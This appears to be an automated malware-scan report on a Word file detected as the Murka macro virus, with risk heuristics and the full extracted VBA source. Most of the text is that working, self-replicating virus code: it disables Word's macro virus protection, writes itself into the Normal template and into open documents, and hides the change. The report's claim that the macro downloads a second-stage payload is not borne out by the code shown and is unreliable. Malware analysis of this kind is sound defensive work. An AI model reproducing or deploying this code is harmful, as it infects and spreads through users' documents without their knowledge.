MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Murka-1. Static analysis revealed the presence of VBA macros within the document. The macro code, specifically within the Document_Close subroutine, appears to be designed to download and execute a second-stage payload, as indicated by comments within the script and the overall structure.
Heuristics 2
-
ClamAV: Doc.Trojan.Murka-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Murka-1
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9062 bytes |
SHA-256: 401c805b3ab3a1ab0cf95d252a6b5ebcb6e30b2a3a6ee996aa136ef8e38458ae |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
'*************************************************************************
'Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!
'Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò
' ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé
'
'Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)
'Äîñòîèíñòâà: Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!
'Íåäîñòàòêè: Ïîêà íå íàøåë
'
'"Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî
' ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!
'Äåä MustDie âàì âñå ðàñêàæåò!
'Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì
'êîìïå. ãäå óæå óñòàíîâëåí àíòèâèðóñíûé ìîäóëü Murka.
'
'Àâòîðó: mustdie@chat.ru
'Murke: murka@chat.ru
'Äàíèëîâó: antivir@dials.ru
'*************************************************************************
On Error Resume Next
Dim s As Boolean
Dim i As Long
Dim j As Long
Dim Murka As String
Dim Other As String
Dim str As String
s = ActiveDocument.Saved
Application.EnableCancelKey = wdCancelDisabled
With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
str = "Document_Close"
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Murka = .Lines(i, j)
End With
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
NormalTemplate.Save
End If
End With
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
i = .ProcBodyLine(str, vbext_pk_Proc)
j = .ProcCountLines(str, vbext_pk_Proc)
Other = .Lines(i, j)
If Other <> Murka And Murka <> "" Then
.DeleteLines i, j
.InsertLines 1, Murka
Randomize
If Rnd < 0.3 Then With Dialogs(wdDialogFileSummaryInfo): .Title = "Murka3": .Author = "M&M": .Execute: End With
If Left(ActiveDocument.Name, 8) = "Document" Or Left(ActiveDocument.Name, 8) = "Äîêóìåíò" Then
Else
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End If
End With
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
' Processing file: /opt/analyzer/scan_staging/c597c4e2041a42d3bf614f3e7532837f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5213 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' QuoteRem 0x0000 0x0049 "*************************************************************************"
' Line #2:
' QuoteRem 0x0000 0x0048 "Murka - Ýòî ñàìûé ìàëåíüêèé èç âñåõ èçâåñòíûõ ÌàêðîÀíòèâèðóñíûõ ìîäóëåé!"
' Line #3:
' QuoteRem 0x0000 0x003D "Ïðèíöèï äåéñòâèÿ: Çàãðóæàåòñÿ âìåñòå ñ äîêóìåíòîì è áëîêèðóåò"
' Line #4:
' QuoteRem 0x0000 0x0033 " ðàñïðîñòðàíåíèå çàðàæåííûõ ìîäóëåé"
' Line #5:
' QuoteRem 0x0000 0x0000 ""
' Line #6:
' QuoteRem 0x0000 0x002B "Óñëîâèÿ ðàñïðîñòðàíåíèÿ: Freeware(Ñâîáîäíî)"
' Line #7:
' QuoteRem 0x0000 0x0037 "Äîñòîèíñòâà: Êîððåêòíàÿ ðàáîòà, íàäåæíîñòü!"
' Line #8:
' QuoteRem 0x0000 0x0026 "Íåäîñòàòêè: Ïîêà íå íàøåë"
' Line #9:
' QuoteRem 0x0000 0x0000 ""
' Line #10:
' QuoteRem 0x0000 0x003A ""Âñå ýòî, êîíå÷íî, õîðîøî, íî ÿ íè õðåíà íå ïîíÿë, êàê åãî"
' Line #11:
' QuoteRem 0x0000 0x0030 " ìîæíî ïðåîáðåñòè?!" - ãíåâíî ñêàæåøü òû. Ìîæíî!"
' Line #12:
' QuoteRem 0x0000 0x001D "Äåä MustDie âàì âñå ðàñêàæåò!"
' Line #13:
' QuoteRem 0x0000 0x0030 "Íåîáõîäèìî ëèøü îòêðûòü äîêóìåíò íà ïåðñîíàëüíîì"
' Line #14:
' QuoteRem 0x0000 0x0034 "êîìïå. ãäå óæå óñòàíîâëåí
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.